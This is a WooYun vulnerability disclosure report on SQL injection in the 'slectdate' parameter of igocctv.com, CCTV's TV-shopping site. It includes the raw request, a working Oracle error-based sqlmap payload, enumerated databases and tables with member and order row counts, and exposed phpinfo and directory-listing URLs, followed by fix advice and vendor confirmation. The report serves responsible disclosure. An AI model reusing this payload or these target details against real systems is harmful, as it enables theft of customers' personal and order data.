当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050464

漏洞标题:中国网络电视台某站点存在SQL注射漏洞导致信息泄漏

相关厂商:中国网络电视台

漏洞作者: Mr.leo

提交时间:2014-02-08 16:36

修复时间:2014-03-25 16:37

公开时间:2014-03-25 16:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-08: 细节已通知厂商并且等待厂商处理中
2014-02-08: 厂商已经确认,细节仅向厂商公开
2014-02-18: 细节向核心白帽子及相关领域专家公开
2014-02-28: 细节向普通白帽子公开
2014-03-10: 细节向实习白帽子公开
2014-03-25: 细节向公众公开

简要描述:

中国网络电视台某站点存在SQL注射漏洞导致信息泄漏

详细说明:

站点:
http://www.igocctv.com 中央电视台唯一的电视购物官方网站
slectdate参数没有过滤,导致注射漏洞
burp抓包如下:

POST /igo/manage/live/getLiveList HTTP/1.1
Content-Length: 15
Content-Type: application/x-www-form-urlencoded
Referer: http://www.igocctv.com
Cookie: JSESSIONID=749C6635D1F70F5781CA442E272B02B5
Host: www.igocctv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
slectdate=1
sqlmap跑起来
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: POST
Parameter: slectdate
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: slectdate=1') AND 6267=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(98)||CHR(109)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (6267=6267) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(108)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL) AND ('dcVr'='dcVr
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: slectdate
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: slectdate=1') AND 6267=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(98)||CHR(109)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (6267=6267) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(108)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL) AND ('dcVr'='dcVr
---
current user:    'IGO086'
current schema (equivalent to database on Oracle):    'IGO086'
available databases [8]:
[*] CTXSYS
[*] ET1_TV
[*] EXFSYS
[*] IGO086
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
156张表
Database: IGO086
[159 tables]
+-------------------------------+
| AAA                           |
| ADDRESS_INTERFACE_LOG         |
| ADS_LINK_TASK                 |
| BASE_CODE                     |
| BASE_CONFIG                   |
| BASE_DEPARTMENT               |
| BASE_REGIONS                  |
| BASE_TIME_SET                 |
| BASE_USERS                    |
| CLIENT_COUNT                  |
| COMM_ATTRIBUTE_ITEM           |
| COMM_ATTRIBUTE_LISTS          |
| COMM_BRAND                    |
| COMM_CATEGORY                 |
| COMM_CATEGORY_COMMODITY       |
| COMM_COLOUR                   |
| COMM_COLOUR_STYLE             |
| COMM_COLOUR_TYPE              |
| COMM_COMMODITY                |
| COMM_COMMODITY_BACKUP         |
| COMM_COMMODITY_BAK_20130325   |
| COMM_COMMODITY_ORDER          |
| COMM_CONFIGURE_SUB            |
| COMM_EIGHT_TASK               |
| COMM_EXTENSION_ATTRIBUTE      |
| COMM_GROUP_BUY                |
| COMM_IMAGE                    |
| COMM_INDEX_LABEL              |
| COMM_INTERVAL_SUB             |
| COMM_LABEL                    |
| COMM_LABEL_COMMODITY          |
| COMM_LABEL_TYPE               |
| COMM_MANUFACTURER             |
| COMM_NAME_SEARCH              |
| COMM_NAME_SEARCH_20130306     |
| COMM_PHONE_IMAGE              |
| COMM_PHONE_LABEL_COMMODITY    |
| COMM_PLAN_TASK                |
| COMM_QUERY_CONFIGURE          |
| COMM_QUERY_INTERVAL           |
| COMM_RECOMMEND_COMMODITY      |
| COMM_RELATIVE_COMMODITY       |
| COMM_SECKILL                  |
| COMM_STYLE                    |
| COMM_STYLE_TYPE               |
| COMM_SUBJECT                  |
| COMM_SUBJECT_ATTRIBUTE        |
| COMM_SUBJECT_COMMODITY        |
| COMM_SUPPLIER                 |
| COMM_TYPE                     |
| COMM_TYPE_BRAND               |
| DELETE_CUSTOMER               |
| MANA_NAVIGATION               |
| MANA_PAGES                    |
| MANA_PAGE_CONTENT             |
| MANA_PAGE_DATA                |
| MANA_PAGE_PROMPT              |
| MARK_ARRIVAL_NOTICE           |
| MARK_AWARD_WINNERS            |
| MARK_COMMODITY_EVALUATION     |
| MARK_COMPLAINT                |
| MARK_CONSULTATION             |
| MARK_COUPONNUMBER_RELATION    |
| MARK_DISCOUNT                 |
| MARK_EC_CAMPAIGN              |
| MARK_EMAIL_PROMPT             |
| MARK_EVALUATION_ITEM          |
| MARK_EVALUATION_RELATION      |
| MARK_GROUP_BUY                |
| MARK_LEAGUE_CODE              |
| MARK_LEAGUE_INCOME            |
| MARK_LEAGUE_MEMBER            |
| MARK_LIVE_STRONG              |
| MARK_LIVE_TELECAST            |
| MARK_LOTTERY                  |
| MARK_LOTTERY_PRIZE            |
| MARK_MARKETING                |
| MARK_MARKETING_COMMODITY      |
| MARK_NEWS                     |
| MARK_SPECIAL_TOPIC            |
| MARK_STRONG_PREORDER          |
| MARK_TIME_SET                 |
| MEMB_ARCHIVE                  |
| MEMB_ARCHIVE_BAK              |
| MEMB_BLACKLIST                |
| MEMB_BLACKLIST_HISTORY        |
| MEMB_CARD_MANAGE              |
| MEMB_CATALOG_DELIVERY_ADDRESS |
| MEMB_COUPONS                  |
| MEMB_DELIVER_ADDRESS          |
| MEMB_DELIVER_ADDRESS2         |
| MEMB_EMAIL_CANCEL             |
| MEMB_FAVORITE                 |
| MEMB_FEEDBACK_NOTES           |
| MEMB_INTERFACE_LOG            |
| MEMB_INVOICE                  |
| MEMB_LEVEL                    |
| ORDE_BANK_SET                 |
| ORDE_CHINAPAY_PAYMENT         |
| ORDE_DELIVERY_COMPANY         |
| ORDE_EXCHANGE_APPLY           |
| ORDE_FREIGHT_RULE             |
| ORDE_INFO_SEND                |
| ORDE_INTERFACE_LOG            |
| ORDE_ORDERS                   |
| ORDE_ORDERS_TEMP              |
| ORDE_ORDER_DETAIL             |
| ORDE_PAYMENTS                 |
| ORDE_PAYMENT_LOG              |
| ORDE_REFUNDS_APPLY            |
| ORDE_RESCISSION               |
| ORDE_SALE_LOGS                |
| ORDE_STATUS_CHANGE            |
| PERM_ACCESS_LOG               |
| PERM_AUDIT_LOGS2              |
| PERM_AUTHN_AD_LEAGUE          |
| PERM_AUTHN_MANAGER            |
| PERM_AUTHN_MEMBER             |
| PERM_AUTHN_SUPPLIER           |
| PERM_AUTHN_USER               |
| PERM_AUTHZ_GROUP              |
| PERM_AUTHZ_GROUP_ROLE         |
| PERM_AUTHZ_RESOURCE           |
| PERM_AUTHZ_ROLE               |
| PERM_AUTHZ_ROLE_RESOURCE      |
| PERM_AUTHZ_USER_GROUP         |
| PERM_AUTHZ_USER_ROLE          |
| QRTX_SCHEDULER                |
| QRTX_TASK                     |
| QRTX_TASK_TYPE                |
| QRTX_TRIGGER                  |
| QRTX_TRIGGER_TYPE             |
| QRTZ_BLOB_TRIGGERS            |
| QRTZ_CALENDARS                |
| QRTZ_CRON_TRIGGERS            |
| QRTZ_FIRED_TRIGGERS           |
| QRTZ_JOB_DETAILS              |
| QRTZ_JOB_LISTENERS            |
| QRTZ_LOCKS                    |
| QRTZ_PAUSED_TRIGGER_GRPS      |
| QRTZ_SCHEDULER_STATE          |
| QRTZ_SIMPLE_TRIGGERS          |
| QRTZ_SYNC_TIMESTAMP           |
| QRTZ_TRIGGERS                 |
| QRTZ_TRIGGER_LISTENERS        |
| REPO_ADDITIONAL_INFORMATION   |
| REPO_ATTRIBUTE_LIST           |
| REPO_CARD_CATEGORY            |
| REPO_CARD_TYPE                |
| REPO_COMMODITY_ATTRIBUTE      |
| REPO_COMMODITY_HISTORY        |
| REPO_COMMODITY_HISTORY2       |
| REPO_GROUP                    |
| REPO_ROLE                     |
| REPO_ROLE_GROUP               |
| TCRM_CUSTOMER3                |
| TOAD_PLAN_SQL                 |
| TOAD_PLAN_TABLE               |
| XUE_SHENG                     |
+-------------------------------+
数据量还是很大的
Database: IGO086
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| ORDE_ORDER_DETAIL             | 2684436 |
| ORDE_ORDERS                   | 2568788 |
| MEMB_DELIVER_ADDRESS          | 1638637 |
| PERM_AUTHN_MEMBER             | 1502375 |
| MEMB_ARCHIVE                  | 1502372 |
| MEMB_ARCHIVE_BAK              | 636391  |
| REPO_COMMODITY_HISTORY        | 367781  |
| COMM_NAME_SEARCH              | 164282  |
| REPO_COMMODITY_ATTRIBUTE      | 108712  |
| COMM_NAME_SEARCH_20130306     | 95978   |
| COMM_RELATIVE_COMMODITY       | 71758   |
| ORDE_STATUS_CHANGE            | 67977   |
| PERM_AUTHN_USER               | 47370   |
| ORDE_PAYMENT_LOG              | 42509   |
| MARK_LIVE_TELECAST            | 29867   |
| ORDE_INTERFACE_LOG            | 20402   |
| COMM_CATEGORY_COMMODITY       | 13710   |
| COMM_COMMODITY                | 12329   |
| COMM_PLAN_TASK                | 10864   |
| MEMB_FAVORITE                 | 10743   |
| MEMB_EMAIL_CANCEL             | 10378   |
| COMM_IMAGE                    | 10160   |
| COMM_EXTENSION_ATTRIBUTE      | 9846    |
| COMM_COMMODITY_BAK_20130325   | 7772    |
| TCRM_CUSTOMER3                | 6979    |
| REPO_COMMODITY_HISTORY2       | 6476    |
| DELETE_CUSTOMER               | 5047    |
| MARK_CONSULTATION             | 4168    |
| COMM_SUBJECT_COMMODITY        | 2939    |
| MARK_STRONG_PREORDER          | 2454    |
| COMM_SUBJECT                  | 1572    |
| MEMB_INTERFACE_LOG            | 1455    |
| ADDRESS_INTERFACE_LOG         | 1424    |
| COMM_SUPPLIER                 | 1173    |
| COMM_RECOMMEND_COMMODITY      | 870     |
| ADS_LINK_TASK                 | 837     |
| COMM_STYLE                    | 694     |
| MARK_ARRIVAL_NOTICE           | 678     |
| COMM_ATTRIBUTE_LISTS          | 652     |
| MEMB_DELIVER_ADDRESS2         | 634     |
| ORDE_CHINAPAY_PAYMENT         | 618     |
| MEMB_CATALOG_DELIVERY_ADDRESS | 493     |
| COMM_CATEGORY                 | 358     |
| MANA_PAGES                    | 351     |
| MARK_LIVE_STRONG              | 326     |
| COMM_COMMODITY_BACKUP         | 286     |
| COMM_COLOUR                   | 279     |
| MARK_SPECIAL_TOPIC            | 220     |
| CLIENT_COUNT                  | 219     |
| COMM_CONFIGURE_SUB            | 202     |
| COMM_QUERY_CONFIGURE          | 194     |
| COMM_LABEL_COMMODITY          | 160     |
| COMM_GROUP_BUY                | 154     |
| ORDE_RESCISSION               | 141     |
| COMM_SUBJECT_ATTRIBUTE        | 136     |
| COMM_PHONE_LABEL_COMMODITY    | 133     |
| PERM_AUTHZ_USER_ROLE          | 127     |
| AAA                           | 117     |
| PERM_AUTHN_MANAGER            | 113     |
| COMM_ATTRIBUTE_ITEM           | 108     |
| REPO_ATTRIBUTE_LIST           | 108     |
| ORDE_ORDERS_TEMP              | 102     |
| REPO_ROLE_GROUP               | 99      |
| PERM_AUTHZ_ROLE_RESOURCE      | 76      |
| MARK_NEWS                     | 72      |
| PERM_AUTHZ_RESOURCE           | 60      |
| COMM_TYPE                     | 56      |
| QRTZ_SYNC_TIMESTAMP           | 54      |
| BASE_CONFIG                   | 51      |
| COMM_COMMODITY_ORDER          | 39      |
| MARK_COMMODITY_EVALUATION     | 37      |
| REPO_CARD_CATEGORY            | 35      |
| REPO_CARD_TYPE                | 31      |
| MEMB_FEEDBACK_NOTES           | 29      |
| MANA_PAGE_PROMPT              | 26      |
| COMM_INDEX_LABEL              | 25      |
| TOAD_PLAN_TABLE               | 21      |
| COMM_BRAND                    | 19      |
| PERM_AUTHZ_ROLE               | 17      |
| REPO_GROUP                    | 16      |
| BASE_CODE                     | 14      |
| COMM_QUERY_INTERVAL           | 14      |
| COMM_PHONE_IMAGE              | 12      |
| COMM_LABEL                    | 11      |
| QRTX_TRIGGER                  | 11      |
| QRTX_SCHEDULER                | 10      |
| QRTX_TASK                     | 10      |
| MEMB_BLACKLIST_HISTORY        | 9       |
| COMM_EIGHT_TASK               | 8       |
| MARK_COUPONNUMBER_RELATION    | 8       |
| COMM_INTERVAL_SUB             | 7       |
| MEMB_LEVEL                    | 6       |
| ORDE_BANK_SET                 | 6       |
| QRTZ_LOCKS                    | 5       |
| REPO_ROLE                     | 5       |
| MEMB_BLACKLIST                | 4       |
| BASE_TIME_SET                 | 3       |
| COMM_LABEL_TYPE               | 3       |
| TOAD_PLAN_SQL                 | 2       |
| COMM_TYPE_BRAND               | 1       |
| QRTX_TASK_TYPE                | 1       |
| QRTX_TRIGGER_TYPE             | 1       |
+-------------------------------+---------+


用户表中的字段

348.jpg


phpinfo信息
http://www.igocctv.com/phpinfo.php
送个另外1个站点的目录遍历和phpinfo
http://202.108.16.191/i.php
http://202.108.16.191/public/images/
over

漏洞证明:

已经证明

修复方案:

1#过滤参数
2#屏蔽敏感信息

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-02-08 16:55

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无

漏洞评价:

评论